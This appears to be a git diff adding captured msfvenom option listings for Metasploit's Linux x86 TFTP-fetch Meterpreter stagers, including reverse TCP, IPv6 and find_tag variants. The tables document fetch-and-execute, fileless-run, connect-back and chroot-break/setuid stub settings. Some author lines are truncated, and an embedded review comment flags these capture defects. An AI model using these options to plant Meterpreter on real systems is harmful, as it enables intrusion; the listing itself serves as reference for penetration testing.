+ Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-find_tag.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-find_tag.txt new file mode 100644 index 0000000..e141f6b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-find_tag.txt 
@@ -0,0 +1,101 @@ + + Name: TFTP Fetch, Find Tag Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/find_tag + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 108 + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/find_tag: +========================= + +b@rapid7.com> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EQRJfWjqVl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to 
preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG B2Pi yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..fd9b876 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_ipv6_tcp.txt 
@@ -0,0 +1,110 @@ + + Name: TFTP Fetch, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp: +========================= + +d7.com> + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dIQwCFOyn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + 
WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_nonx_tcp.txt new file mode 100644 index 0000000..5c27eae --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_nonx_tcp.txt 
@@ -0,0 +1,109 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp: +========================= + + + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CzjraSqbEZxX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + 
WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..9feb879 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,111 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp: +========================= + +apid7.com> + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZghrjpqncEbT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + 
WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..f422eab --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-reverse_tcp_uuid.txt 
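Review bot: the module header in this capture is damaged and the file should be regenerated before it is committed: the contributor list under the Evasion options banner reads only `apid7.com>` with no `Provided by:` heading, there is no `Rank:` line, and `Platform:` reads `Linux, Linux`. Re-run the `--list-options` capture and check whether the duplicated platform comes from the module metadata itself rather than the capture. Two text defects visible here belong upstream rather than in this repository but are worth reporting: the `AppendExit` row carries `PrependChrootBreak`'s description (`Prepend a stub that will break out of a chroot`), and the `FETCH_FILELESS` description opens a parenthesis it never closes (`(for Python variant also Python ≥3.8 (Accepted: ...)`).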
@@ -0,0 +1,111 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid: +========================= + + + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RsvPATWCwhOw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
